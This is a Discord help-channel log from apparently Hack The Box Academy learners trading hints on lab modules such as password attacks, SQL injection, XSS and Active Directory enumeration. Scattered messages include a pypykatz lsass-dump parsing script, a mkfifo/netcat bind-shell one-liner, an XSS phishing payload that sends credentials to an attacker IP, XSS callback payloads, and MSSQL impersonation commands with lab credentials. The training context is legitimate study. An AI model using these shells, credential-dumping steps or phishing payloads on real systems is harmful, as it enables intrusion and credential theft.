#modules

1 messages · Page 221 of 1

viral glacier
#

say less

slender shoal
#

Thanks @fathom pendant

fathom pendant
slender shoal
#

Yeah, earlier was auto.. but they got a forced 24 hour break

fathom pendant
#

Bet

shut quest
#

Thank you!

cedar yew
#

Hello guys i need help,

Module - Password Attack
Section - Windows Local Password Attacks - attacking lsass

myproblem-> I compiled the lsass file using the Pypykatz tool, but I did not find any information about the vendor user.
https://academy.hackthebox.com/module/147/section/1359

fathom pendant
#

Did you do try other methods? Also idr pypykatz being useful for a windows lab

next bronze
#

wdym compiled the lsass file?

fathom pendant
#

Also this ^ pypykatz extracts from a .dmp

cedar yew
#

What are other methods?

fathom pendant
#

Didn't realize this section didn't go over using stuff like secretsdump or @next bronze super cool dump tool

next bronze
#

how could they FeelsMadMan

#

secrets dump doesn't dump lsass tho

#

oh they only talked about pypykatz, weird

fathom pendant
cedar yew
#

yes i tried secretsdump

next bronze
#

if it's for lsass secretsdump can't get it

#

pypykatz should work, let me test it

fathom pendant
#

Either way the .dmp file has what you need

#

Or it should

cedar yew
#

i will check again

#

thank you

fathom pendant
#

If you want you can add | grep -i "vendor" -C 10

#

That should at least make it easier to see

#

(-C gives context lines around it)

#

-A is after, -B is before

cedar yew
#

its worked

#

thanks

shut quest
fathom pendant
next bronze
#

cool just found a bug in my tool sadglas

fathom pendant
crystal steeple
#

stuck on sqlmap essentials skill assessement, located the post req but can't bypass protections

#

i tried all things covered in module, im literally just spamming one tamper technique after another

red bridge
#

Is this the right Channel to give feedback on a module?

red bridge
#

thank you

mellow delta
#

I am still beating my head against the wall trying to figure out this domain enumeration module

shut quest
mellow delta
crystal steeple
#

percentage is that giving me hope rn but idk

hollow dawn
#

hi guys i need help, i found the flag but it shows me that it is incorrect
module: passowrd attacks -> section: pass the ticket from linux

crystal steeple
#

also they taking forever to finish , and i dont even like what im doing rn, i mean i should be able to know whats happening to be able to choose tamper not just spam them

shut quest
onyx robin
#

Hi guys! I have a problem with my parrot os in virtualbox, when i try to boot it i have a message of : to please switch to a supported graphic device to avoid problem, what can i do? is the first time it happens

shut quest
mellow delta
#

The whole section really, I got the fqdn and somehow figured out that there are 2 zones, struggling to find the Txt record now

next bronze
shut quest
crystal steeple
next bronze
#

maybe don't use --dump, it will take longer, have it list the available database, then you can make it dump a specific table in that db

hollow dawn
next bronze
#

seems right, make sure there's no spaces before and after

shut quest
mellow delta
fathom pendant
#

Nslookup can also get you answers, but far and away dig is just a cleaner tool

#

Much nicer output

mellow delta
fathom pendant
#

It happens

mellow delta
#

I know that there are two zones but for the life of me I can only get nslookup to output that there is one

crystal steeple
#

thanks @next bronze and @shut quest , my internet is slow af i just realised i was connected to my friends hotspot connection which made sqlmap to run so slow lol

#

got the database name and got flag !

shut quest
fathom pendant
mellow delta
fathom pendant
#

You can look at subdomains with it too

mellow delta
fathom pendant
#

Double on both sides

#

|| ||like this|| ||

hollow dawn
mellow delta
#

||I have the synatx right, I should just look at subdomains?||

fathom pendant
#

Yes

mellow delta
#

cool

fathom pendant
#

You should have a list of available things to look at

mellow delta
#

I do, yes

fathom pendant
#

Try looking within

mellow delta
#

will do, Thank you

sacred gull
#

Ive probably missed something stupid but on the WinEsc module and the weak permissions section I have added myself to the administrator group by modifying a services binpath to add me to the 'local administrators group' but can't access the administrator user folder?

sacred gull
#

ahh okay thankyou

upbeat island
#

I’m lost in footprinting IPMI las question “what is the account’s cleartext password” I do not know what to do.

mellow delta
fathom pendant
#

Don't use the mask (a3 ?1?1?1?1?1?1?1?1)
do use the mode

upbeat island
#

I try to use hashcat but think it does not work, it says “separator unmatched”

fathom pendant
#

Then you copied it incorrectly

next bronze
#

probably need to use --username

fathom pendant
#

That too

upbeat island
#

When use - - username it says “failed to parse hashes using the native hashcat format”

upbeat island
#

I did here not in the prompt

fathom pendant
#

Don't add spaces here then :) it avoids confusion

#

Either way did you copy the hash exactly as shown in the msfconsole output?

#

(And are you using the 7300 mode)

upbeat island
#

Yes

next bronze
#

whats your hashcat command

upbeat island
#

Hashcat -a 0 -m 7300 —username

next bronze
#

..did you include the hash?

upbeat island
#

Yes

next bronze
cloud urchin
#

that hashcat command is missing some inputs

sleek moss
#

BRUH IS HTB WEBSTIE WORKING FOR ANYBODY

vale mulch
#

nope, it's down I guess

minor stag
#

My machine crashed, so at least I know it's not just me

ember coral
#

yep came here to check lol, my machine crashed, and now wont spawn

thorn urchin
#

the team is aware. hang tight

languid fjord
#

We're looking into the issues

full leaf
#

phew, i thought i was trippin

languid fjord
#

Ill update here when i can

full leaf
#

dope

mellow delta
# fathom pendant Don't put spaces

I am on the last question now finally. How many A Records are there for all zones. I know there are 2 zones, but every time I can only identify one zone

vale mulch
#

done, working again

fathom pendant
mellow delta
cloud urchin
#

last time i got yelled at by staff for mentioning the platform was down here, they said to reach out to support

fathom pendant
cloud urchin
#

when it first happened g0blin mentioned it here and let us all know it was a known issue and being worked on, then the other night it happened again and i asked here and was told it wasn't the place to discuss it, but now we have staff here talking about it again. really confusing inconsistency with policy.

#

so now it seems again that it's OK to ask here if there are technical issues with the platform? is there a page we can visit to get the policy for the day?

#

surely it's not just up to how the staff member is feeling at the time, is it?

thorn urchin
#

Generally this isnt the place to ask no, simply because the majority of the time its a personal issue and its just annoying to have people pester others when its their own connection, so you should contact support about such issues.

But like if a staff member wants to pop in to reassure people real quick thats okay for them to still do so.

tidal mango
#

is there anyone on here who did the Introduction to Python 3 module? I can't get it to take the answer for the Managing Libraries in Python (Continued) section, (question 2) and just wanted to see if I am putting the wrong thing in, it seems like an obvious answer to me.... Thanks!

languid fjord
#

Things should all be working fine now btw

languid fjord
#

your welcome to ask here if you think the community knows

#

but for any support from HTB, it needs to go via the platform

cloud urchin
#

right.. but if the platform is down you can't do that lol

languid fjord
#

but yeah if its down just dont spam it

#

mind if i dm? @cloud urchin

cloud urchin
#

sure

neat sky
#

can you dm the script or help me this is the last question i need for this module

next bronze
neat sky
next bronze
#

you can use

replace(tzinfo=pytz.UTC)
sick shale
#

hey all, somebody can help me with the easy lab of Attacking Common Services? I already have the creds of the user f*****but i'm stuck. Can't seem to authenticate to the smtp server

#

Maybe it's a problem with my understanding of smtp

soft cedar
dreamy yew
#
  1. check if ftp anon is allowed, the files inside might be used to u 🙂
neat sky
sick shale
#

Thanks !

crimson moon
#

Is the target spawning for you guys?

sick shale
neat sky
sick shale
sick shale
#

i cant connect with the credential i have via rdp

soft cedar
#

Read the files; one of them shows how to get a reverse shell

#

There is more than one way of doing it

weary torrent
#

hi guys having a problem with suricata rule development as i'm unable to rdp for the last hour, anyone has any idea how to figure this out ?

autumn pilot
#

SSH

weary torrent
# autumn pilot SSH

turns out it was because i did not type this at the end : /relax-order-checks +glyph-cache

cloud urchin
#

sounds super legit

#

<@&861185840277487616>

sick shale
solar zodiac
#

I wonder what the new academy modules are going to be about 🙂

#

I'd love to see more modules for the binexp path 😄 or maybe some cloud modules

#

❤️ academy

stiff parrot
#

dir

limpid frigate
#

can i dm anyone for some help at Question 8 in module AD Skill assessment II

ruby whale
#

Ask here I will try to help

fickle thicket
#

need some clarification regarding chisel. does chisel starts a socks proxy automatically without needing to specify the proxy and also automatically creates a SSH connection meaning the ssh command is not needed to start ssh, chisel will start ssh ?
./chisel client -v 10.129.202.64:1234 socks.
2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected

limpid frigate
#

i got nt system at at host SQL01 and i already transfer mimikatz, but when i run it, there is nothing happen and i cant even interact with anything so i gotta do everything all over again

ruby whale
#

checks

  1. did you run mimikatz with administrator privileges?
limpid frigate
#

i mean the GUI not even pop up ...

#

it just hang there

ruby whale
#

Are you trying to RDP into it? I dont remember if SQL01 has RDP access (I may be mistaken) , try with psexec or winrm ?

limpid frigate
#

i got service user in mssql then from mssql i reverse to my box, then elevate to system so i cant winrm yet

ruby whale
#

Mimikatz shoud ideally work in the shell of SQL01

limpid frigate
#

ikr, but i got shell with nt system and when i ran it, the shell keep hanging there ...

ruby whale
#

I cant think anything at the moment that will help you.

limpid frigate
#

thanks, i guess the lab got some problem

ruby whale
#

Try restarting the lab

cedar yew
#

hello guys,
I prepared a bash script. This script saves each user information in the content of the lsass.dmp file to a different txt file.

#!/bin/bash

lsass_dump="$1"

if [ ! -f "$lsass_dump" ]; then
echo "Error: lsass.dmp file not found!"
exit 1
fi

mimikatz_output=$(pypykatz lsa minidump "$lsass_dump")

counter=1

while IFS= read -r line; do
if [[ $line == "== LogonSession ==" ]]; then
filename="LogonSession_$counter.txt"
counter=$((counter+1))
fi
echo "$line" >> "$filename"
done <<< "$mimikatz_output"

echo "LogonSession information successfully extracted and saved to files."

#

ogonSession_1.txt LogonSession_12.txt LogonSession_15...

#

hopefully it benefits your business

snow ridge
#

<@&861185840277487616>

west rampart
#

@tired schooner i have a real job

crystal steeple
#

you may find something juicy there 😉

regal bluff
#

can I discuss something about AD enum module with someone. One thing got me confused.

upbeat oak
#

is there a certain reason you would want to use export when using whois dig and nslookup instead of just using the commands on the target domain I know export is for setting environment variable just confused why they do it like this in the module

limpid frigate
fathom pendant
upbeat oak
#

makes since thank you

rustic sage
#

Anyone having issues with the target ip not spawning

#

Nvm just was slow

dreamy yew
#

Module: Attacking Common Services, Section: Attacking SQL Databases, Question: Why i cannot crack the ntlm hash intercepted by impacket-server, using either password given at Resources or rockyou.txt, might need a nudge

#

ntlm hash intercepted: ```
mssqlsvc::WIN-02:aaaaaaaaaaaaaaaa:lm:nt

cloud urchin
#

the password may be too strong, you can always pass the hash

dreamy yew
#

mmm ok ill try it now

faint gulch
#

I am doing the Using CrackMapExec module and I am having a bit of a trouble in the Gathering Information with an Account -> MSSQL Enumeration and Attacks section. I have found the user for the first question, but when I try to query the database core_app it seems that it is empty (I have confirmed that it exists though):

||```bash
$ nxc mssql 10.129.204.177 -u 'engels' -p 'Inlanefreight1998!' -q 'SELECT table_name FROM core_app.INFORMATION_SCHEMA.tables'
MSSQL 10.129.204.177 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL 10.129.204.177 1433 DC01 [+] inlanefreight.htb\engels:Inlanefreight1998!


I thought it might be an access issue, since this user it is not a DBA, but privesc does not work either:

||```bash
$ nxc mssql 10.129.5.141 -u 'engels' -p 'Inlanefreight1998!' -M mssql_priv -o ACTION=privesc
MSSQL       10.129.5.141    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.5.141    1433   DC01             [+] inlanefreight.htb\engels:Inlanefreight1998!
MSSQL_PR...                                         [*] INLANEFREIGHT\engels can impersonate: julio
MSSQL_PR...                                         [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR...                                         [-] can't find any path to privesc
```||

Any nudge would be highly appreciated!
dreamy yew
#

i have error passing the hash, what was the syntax of the command :0

sly grotto
#

hey any hint for it?

faint gulch
dreamy yew
#

i am trying to answer this question: What is the password for the "mssqlsvc" user?

cloud urchin
faint gulch
cloud urchin
cloud urchin
# faint gulch ||engels, grace,diana||

at the very start of the mssql privesc section, there's a paragraph with the last sentence saying "In the following example, the user INLANEFREIGHT\robert has the privilege to impersonate julio who is a sysadmin user." .... have you tried those credentials?

cloud urchin
dreamy yew
cloud urchin
#

nm i see you need the pass, surely it's crackable then

#

can you dm it to me

dreamy yew
#

sure

faint gulch
# cloud urchin at the very start of the mssql privesc section, there's a paragraph with the las...
$ nxc mssql 10.129.5.141 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
MSSQL       10.129.5.141    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL       10.129.5.141    1433   DC01             [+] inlanefreight.htb\robert:Inlanefreight01!
MSSQL_PR...                                         [*] INLANEFREIGHT\robert can impersonate: julio
MSSQL_PR...                                         [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR...                                         [-] can't find any path to privesc

The thing is julio is not shown as a sysadmin, so it can't really privesc to its account. I have tried all combinations of authentication methods as well: --local-auth, -d ., and -d inlanefreight.htb, but none worked.

cloud urchin
next bronze
cloud urchin
#

that's interestin, good to know

faint gulch
solid moth
#

i am doing footprinting lab-hard. i already got 'tom' and the password .Then igot a openssh private key by imaps.But the key doesn't work anyone can help?

#

it says : error in libcrypto

next bronze
cloud urchin
#

I just tested the answer I gave, which is in the module, on both CME and NXE, and they both work.

shut quest
cloud urchin
solid moth
fringe urchin
fathom pendant
shut quest
#

The whole file? Or its contents?

fathom pendant
#

I've seen it happen a few times

#

Where the only way to see it is either with file id_rsa or vim -b id_rsa

faint gulch
fathom pendant
#

Where instead of the $ at the end you see ^W

solid moth
#

use this "1 FETCH 1 body[]" and copied the content

fathom pendant
fringe urchin
fathom pendant
#

The ----BEGIN and ----END lines are important

solid moth
#

i did copy from "--BEGIN OPENSSH PRIVATE KEY-----
" to "-----END OPENSSH PRIVATE KEY-----"

fathom pendant
#

The BEGIN does need all the -

solid moth
#

five -

crystal steeple
#

im in the phishing part in xss, i used the payload ||'><D3V%0aONmOuSEoVeR%0a=%0aconfirm()><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.198<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <! --||

faint gulch
crystal steeple
#

but im only getting a password prompt in the website

#

not the username

#

nvm i missed a < in my payload

solid moth
#

i really don't know where my problem is

fathom pendant
#

What's your command to ssh?

solid moth
#

ssh -i id_rsa tom@ip

fringe urchin
#

Just incase, is id_rsa 600?

solid moth
#

done that

#

chmod 600 id_rsa

#

i also tried other users

fringe urchin
#

tom is correct

#

Can you just in case try it on pwn box?

faint gulch
# next bronze have you completed the first question?

It is like a VPN issue. I tried doing it from a HTB Parrot instance and there user julio shows as sysadmin. But when I connect from my PC, no matter how many times I restart the target julio is a standard user!

next bronze
#

hmm that is weird, I used my vm throughout the module

solid moth
#

does dm mean talk in private ?

#

am new here

crystal steeple
solid moth
#

no

fathom pendant
#

DM -> direct message

crystal steeple
#

try to chmod 777 id_rsa

fathom pendant
crystal steeple
fathom pendant
#

And then ssh would yell for a different reason

crystal steeple
crystal steeple
fathom pendant
#

If you have an rsa key that's 777 ssh won't allow the connection

#

And explicitly tell you that it's a permissions problem

crystal steeple
fathom pendant
#

It generally wouldn't

#

As there's no reason an rsa file needs to be executed

#

It's only read

crystal steeple
fathom pendant
# solid moth no

Did you try swapping positions of your arguments, ssh tom@ip -i id_rsa

fathom pendant
#

Weird

astral inlet
#

chmod 600

fringe urchin
fathom pendant
#

I dont have the file on me to md5sum it

fringe urchin
astral inlet
#

paste the whole file

#

many people misses parts

harsh sonnet
#

I have a question about "PIVOTING, TUNNELING, AND PORT FORWARDING " ' submodule "RDP and SOCKS Tunneling with SocksOverRDP".
Whenever i try to load the SocksOverRDP DLL using regsvr32 on the footold htb-student, it gets blocked. I made sure the AV is turned off to no avail. Is there a probem with the machine or am i doing something wrong ?

fathom pendant
fathom pendant
fringe urchin
fathom pendant
#

Just because defender is off doesn't mean there isn't any protection

fringe urchin
fathom pendant
fringe urchin
#

let me go boot up the lab hard and see if i can login with that ssh key

#

so we know if mine is correctly or a character slid into it

fathom pendant
#

My other suggestion is pasting into another text editor

solid moth
#

no

fathom pendant
#

Sometimes it's dumb

solid moth
#

it doesn't match

fathom pendant
#

@fringe urchin does yours have an extra line?

fringe urchin
# solid moth no

ok give me a second im booting up lab hard machine and see if i can login so we know if mine is correct

fathom pendant
#

Just to make sure all conditions are similar

solid moth
#

i got in !!!!

fringe urchin
#

mine works

solid moth
#

i used vim

#

vim works !

fathom pendant
#

👍

fringe urchin
astral inlet
#

is there anything else then vim ;p

fringe urchin
fathom pendant
#

Using a second text editor tends to fix issues

solid moth
fathom pendant
crystal steeple
#

hello im in session hijacking, i don't understand the part where the server execute our script.js in our vm locally

#

to identify where the xss is hapenning

#

the "script.js" , is any jS SCRIPT we should write?

#

i can't seem to understand this to identify the injectable field

dense pollen
crystal steeple
dense pollen
brazen saffron
#

I need help about these tasks ** Skills Assessment - Using Web Proxies** (the 3rd question). https://academy.hackthebox.com/module/110/section/1055
Don't read/look at images if you don't want to get spoil ! ⚠️

|| I found the cookie decoded and now I replaced it in the request to have something like it (1st img), then I started an intruder Attack with Burp Suite to find the correct cookie and have a full md5 hash. Why everything is "good" in the requests then ? I missed something 🤔 ? ||

crystal steeple
#

what is the content of that js file that is server on our vm

#

since initially i dont have any js file on my vm

fathom pendant
#

Well you need to create that file

#

From what it sounds like

dense pollen
dense pollen
# crystal steeple what is the content of that js file that is server on our vm

During the detection process, we only want to know what field is vulnerable to XSS. Assume you have 3 field we want to test for XSS: name, username and website
So in order to detect if any of the fields are vulnerable, we send an XSS payload containing that fieldname so when the target executes the XSS, we will know which field was vulnerable.
For example we will use the following three payloads: <script src="http://OUR_IP/username"></script>, <script src="http://OUR_IP/name"></script>, <script src="http://OUR_IP/website"></script>
Once the target executes the payload, we will receive a GET request on our website to either /username, /name or /website

Then we know which field is vulnerable and we can move to the next step to steal the session cookie
Hope that explains it! If you have any more questions, feel free to ask 🙂

crystal steeple
#

so in detection , creating a file isn't necessary

crystal steeple
#

but in the section, they went through different payloads after detecting the vulnerable field using <script>...</script> right?

#

that payload didn't work and instead i was detecting & choosing the payload at the same time

#

is that how its works?

dense pollen
crystal steeple
clever topaz
#

on Attacking Active Directory & NTDS.dit, i tried to bruteforce jmarston password using the password list given by htb but i got nothing, should i try rockyou.txt

fathom pendant
#

AFAIK you don't bruteforce, you crack

#

Bruteforce is a different technique

clever topaz
#

but when i try to use rockyou in crackmapexec

clever topaz
fathom pendant
#

Should be in the ntds.dit iirc

#

Oh wait that's the next Q

#

There's a wordlist suggested by the module section

clever topaz
#

ya but it doesnt work

fathom pendant
#

The fasttrack.txt?

clever topaz
#

nope the password.list

clever topaz
fathom pendant
#

Either way I wouldn't bruteforce with rockyou

clever topaz
#

true the process is long VERY LONG

#

ahahahaah

fathom pendant
#

Use the wordlist showcased in the section

#

Or the mutated wordlist

sage relic
#

Hey, if I have questions about an exercice for a specific module where do I go ?

sage relic
#

Okok

It is Get section in Web request module, the fondamental. I don't understand what I'm supposed to do with devtools and curl, the module shows what to do except that the exercise consists of repairing the site

I don't have information like "search=le", I'm clearly lost

limpid hemlock
#

Hey anyone know from the attacking common services/attacking smb how to download the id-rsa file to login via ssh after we have got the password ?

crystal steeple
#

if you already in the smb session and want to trasnfer id_rsa file to your vm use get id_rsa

#

also you can use help in smb to display commands available to you

ember coral
#

for Linux priv esc, Shared Object Hijacking im so lost. Where is the payroll binary? I found the libshared.so in the developement directory but cant seem to find payroll anywhere

clear bison
#

Embarrassingly enough, I seem to be stuck in the Public Exploits Section of the Getting Started module inside the Pentester path. After scanning the server with various methods, I have discovered that the only consistently open port is 22, running openssh ver. 8.4p1, and the OS is Linux Debian Bullseye or Sid. There are various other ephemeral ports running nginx 1.19.2 and Appache 2.4.41 (Ubuntu). On one of the servers (I have restarted the target server several times) I found one port running Firefly music app, but that was several servers ago. I have searched on Google , exploitdb, and metasploit, and can not find any useable exploits. The hint says to look for plugin exploits, but I don't see any services that are plugins or that use plugins. Any hints would be appreciated.

fringe urchin
fringe urchin
# clear bison Thanks, Schainy.

I hope that it helped you! If not let me know! Im aswell speaking out of my head, if its something specific i would need to get my notes

clear bison
fringe urchin
clear bison
sly grotto
#

Can I DM someone for
ABUSING HTTP MISCONFIGURATIONS
Skills Assessment - Hard ?!

clear bison
fringe urchin
#

If you still have problems i can take a look if you provide screemshots

clear bison
old tide
#

Guys only i don’t have retired machines?

#

I mean there is only 10 machines and they are hard and insane lvl only

#

Or that cause of maintenance?

strange forge
#

Stuck on Attacking SQL Databases, no idea whatsoever. logged in into mssql server using given htb credentials. looked into db found no weird table. stuck there, any hints to follow

fathom pendant
#

"found no weird table"? there isn't gonna be a "weird" table

#

also: did you escalate to the mssqlsvc ?

#

if not: then first find a way to do that - theft is definitely an option

#

(yes that's a hint to the next step method)

strange forge
#

lemme try, thanks

tawdry vapor
#

hi, can anyone help me with SeDebugPrivilege from windows privilege?

flint helm
#

In Exploiting internal Web Applications I in the Advanced XSS and CSRF Exploitation module I have found the secrete table but listing it's contents returns a 500 error. The same "select all" query on the other table works perfectly fine... Anyone can help with this?

timber hatch
#

i am at the skill assesment 1 module attacking common seervices, should'nt i be able to find the user with smtp-user-enum and the provided list in the ressources?

loud dagger
#

anyone have any advice on how to answer questions in learning modules where i don't even know where to start? there have been so many questions that require information that wasn't even covered in the module and i can't figure out how to solve them besides looking up the answer to the question, which i don't really want to do. i want to figure it out myself.

next bronze
#

google specific things, look at documentations

#

what kind of question are you talkling about

loud dagger
#

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
right now i don't even know where to start other than curl https://www.inlanefreight.com

#

curl doesn't even work in the pwnbox for some reason

#

so i have to use a terminal

dim wolf
#

is this part of the Linux Fundamentals module

loud dagger
#

yeah

next bronze
#

pwnbox doesn't have internet access if you're on the free plan

loud dagger
#

i'm on a student plan

next bronze
#

curl should work

loud dagger
#

ok so curl works but it gives me different results than when i use the same command in my terminal

timber hatch
#

i found it yesterday...but did not finish the modul...

soft cedar
#

What’s your command?

timber hatch
#

or the skill assesement

#

smtp-user-enum -M RCPT -U /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt -D inlanefreight.htb -t 10.129.91.250

#

smtp-user-enum -M RCPT -U usernames.txt -D inlanefreight.htb -t 10.129.91.250

#

or with the list in the ressources

soft cedar
timber hatch
#

yes usernames.txt is that list

#

i think i can remember the name...but why do i not find it anymorethinkw

#

spawned a new target and now within seconds i have the result...

gray field
#

Retrieve the contents of the SAM database on the DEV01 host

#

In network attack. No way to connect back to the DMZ host. nc and sbd are not connecting, msfvenom payload is connecting but no shell.

#

There is no firewall. I don't get what can block a reverse shell

gentle root
#

Am I tripping or did the migrate cheatsheets from .md to PDF?

fathom pendant
#

why do you need to connect back to the DMZ? why not just set a pivot

gentle root
fathom pendant
#

that's been a relatively recent/mixed thing

gentle root
#

How to I rebel?

fathom pendant
#

write a strongly worded email

gentle root
#

@slender shoal Hey are you a mod can u fix this?

fathom pendant
#

"I hope this email finds you before I do"

fathom pendant
next bronze
#

nah it's cealry @slender shoal's fault

gentle root
#

Actually it's unfortunate lol

#

I had so many cheatsheets

fathom pendant
#

mods/admins are only on the discord side; (if they don't have the staff role)

dark summit
#

hello, any luck with VAD analysis, i am doing the same module,

gray field
#

@fathom pendant ssh to dmz to set up nc -nlvp should be simply working

next bronze
fathom pendant
#

or from DEV01 back to your machine

#

if back to your machine: you need port-forwarding

#

as the DEV01 is likely on a separate subnet from the jump host

gray field
#

from DEV01 back to the DMZ

fathom pendant
#

well are you using the right IP

#

i.e. the IP that matches the subnet

gray field
#

yes

fathom pendant
#

172.16.x.x

gray field
#

yes

#

I am going to reset, somethings are working better sometimes

next bronze
slender shoal
next bronze
gray field
#

I don't need a tunnel if I receive the shell from my DMZ ssh session

#

There is maybe a conflict with sshuttle

fathom pendant
#

perhaps

#

No

fringe urchin
fathom pendant
#

same troubleshooting steps apply, restart - if you still believe the issue to be with the lab and not your skill -- contact support

next bronze
fringe urchin
fathom pendant
#

ye

#

afaik there's a reset button

next bronze
#

yeah you can reset the exam lab

fringe urchin
#

duckthumbsup ok ty

mellow delta
fathom pendant
#

any vHost will be a hit

#

it's about determining which are false-positives

mellow delta
#

yeah, i used ffuf to find about 12 or 16 vhosts

fathom pendant
#

well then your ffuf is set up incorrectly

#

you need to filter out the default response size

mellow delta
#

how do you determine the default response size?

fathom pendant
#

by using the techniques shown in the section

mellow delta
#

I don't think it covered how to set that

fathom pendant
#

yes it did

#

the simple loop shown in the section showed how the example got the filter size of 612

mellow delta
#

it said the flag -fs is the filter parameter

#

simple loop?

fathom pendant
#

Content-Length = Response size

#

the cat <file> | while read vhost; do ...;done loop

mellow delta
#

lookinf

fathom pendant
#

where it refers to finding a hit for dev-admin

timber hatch
#

attacking common services, skill assesment 1, i found the user, but now no pw. any hint what to do?

fathom pendant
#

well; there's other available services to attack

#

why not use that username to attack a service, perhaps related to the user you found

timber hatch
#

tried a few, but will try againprayge

fathom pendant
#

if it's a certain username try attacking with and without the @domain

fathom pendant
astral inlet
#

and pw reuse is very common

fluid basin
#

Could someone explain why SELECT * FROM logins WHERE username='notAdmin' OR '1' ='1' AND password = 'test'; would not work? HTB says this would be invalid because the username does not exist, but wouldnt the OR condition evaluate to true even regardless from the 1=1?

fathom pendant
#

if there isn't a 'test' password it'll still fail

#

A OR B AND C

#

[A OR B] AND C is how it can be read

#

the and statement is what might invalidate it

mellow delta
mellow delta
#

ah

fathom pendant
#

don't use the small ./vhosts list they give you

#

use the SecLists wordlist they refer to in the reading

mellow delta
#

ok let me try again

mellow delta
fathom pendant
#

also

#

your command is wrong

#

your command would append something like us1www.inlanefreight.htb

mellow delta
fathom pendant
#

no

#

you're using ffuf to identify valid vhosts

#

that actually contain the info we want; everything else redirects to default page

#

you want to put the VHOST before the .inlanefreight.htb

#

the provided vhost they use as an example to baseline with

#

you want it to give you ${VHOST}.inlanefreight.htb (but using curl is EXTREMELY slow)

mellow delta
#

ok, thank you. let me mess around with this information now

fathom pendant
#

ffuf will be faster; and using the right format you will get it

runic remnant
#

In "Windows Privilege Escalation Skills Assessment - Part I", im wondering how you download the printspoofer.exe to the target, I tried doing the python http.server to /users/public, /windows/temp, /windows/tasks, /windows/system32/temp and I got nothing

fathom pendant
#

well it could be that python isn't installed on a windows machine

#

unless you mean download from your system to the target

#

also you might need to specify C:\<filepath>

woeful walrus
#

I just typed out a whole message asking for help and got a warning about sending the same message over and over??? And I lost the whole message I typed out 😦

fathom pendant
#

because it contains a bunch of lines of code

#

which the automod interprets as spam

#

in order to not have that happen: follow and read #welcome

woeful walrus
#

idk if I have an account at app.hackthebox

#

I just need help with a module.

fathom pendant
#

it's free and takes a few minutes to set up

grizzled schooner
#

Anyone have a second to help with Shells and Payload - Bind Shell?

fathom pendant
fathom pendant
woeful walrus
#

Well I've been stuck for like 12 hours so I wanted to be thorough.

fathom pendant
woeful walrus
#

No good deed, right? This is kinda of obnoxious.

fathom pendant
#

i.e. i've tried xyz methods instead of being hyper specific with commands

gray merlin
#

Finally finished the AD module! Phew. That was a tough one.

woeful walrus
#

I was thorough. idk, that isn't a helpful response.

fathom pendant
#

most people that have done the modules will be able to pick up what you want/are struggling with

fathom pendant
fathom pendant
woeful walrus
#

I know. And I lost it. Due to stupid discord nonsense.

grizzled schooner
#

Logged into the SSH account and ran the syntax the module gave ||rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <ip> <port> > /tmp/f|| and then attempted to run ||nc -nv <ip> <port>|| as the module suggest, but it wouldn't work... got connection refused, do I actually have to run the bind syntax on my machine and not the target?

fathom pendant
#

so again what i'm menaing is use less words to convey what you're struggling with

#

instead of focusing on discord/automod deleting it

gray merlin
fathom pendant
grizzled schooner
#

i used sudo, should've prefaced with that

#

That is the right way to do it though right?

woeful walrus
#

Intro to Assembly Language Skills Assessment The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)

completely stuck. dont want to say what I've tried already in fear of this post being automoderated and deletedlike last time.

grizzled schooner
#

sec if you use the pipeline twice before putting text in and then twice when you're done it hides it so it isn't a spoiler

woeful walrus
#

Whoops, wrong questionb: Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

fathom pendant
#

in the ip -l part

#

aka telling it to listen on that interface

#

is that what you did? or did you use your machine's tun0 ip

grizzled schooner
#

I thought so, maybe it's just user error, I'll try again, would it be too much to ask for an explanation of what the bind shell syntax is actually doing? I try to understand everything so it makes sense instead of just typing it, and no I used target ip

grizzled schooner
#

and just to double check you run the bind shell syntax on the target machine right?

fathom pendant
#

yes

grizzled schooner
#

just figured it was worth asking

fathom pendant
#

bind shells are like reverse shells, but the other way around

#

instead of you opening a port on your system and having the target call back, you open a port on the target and have your system call in

woeful walrus
#

Intro to Assembly Language Skills Assessment

Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.

Completely stuck for over 10 hours. Have tried everything I can find in the whole module. Not even sure what the format for the answer should be. Is this a flag?

#

got shellcode for loaded_shellcode, assembled it, gdb'd through it. not sure what I'm looking for. Keep getting seg faults. Have tried several things mentioned throughout module to make it all fit, but I am getting nowhere. Just confused, going in circles.

fathom pendant
#

wait you mean this question has been asked and answered? :O

next bronze
fathom pendant
#

most people don't use the discord search feature

grizzled schooner
#

@next bronze Hey mate, mind if I DM you for a minute?

fathom pendant
#

or even know it exists

fringe urchin
#

Ngl they made it far worse with the new updatesSadgeCry

woeful walrus
#

Ya'll are kinda jerks? Not familiar with discord. Sorry for coming to the community for help looking for help.

Same shit last time I came here for help, too. Not a welcoming community.

#

Very frustrating.

fathom pendant
fathom pendant
#

and Xreous actually linked to an answer

woeful walrus
#

I know. That was nice of them. That was helpful.

fathom pendant
#

i just didn't wanna use the discord search feature for you

#

if you tap the channel name it the top it should give you a menu where you can find the search if on mobile

#

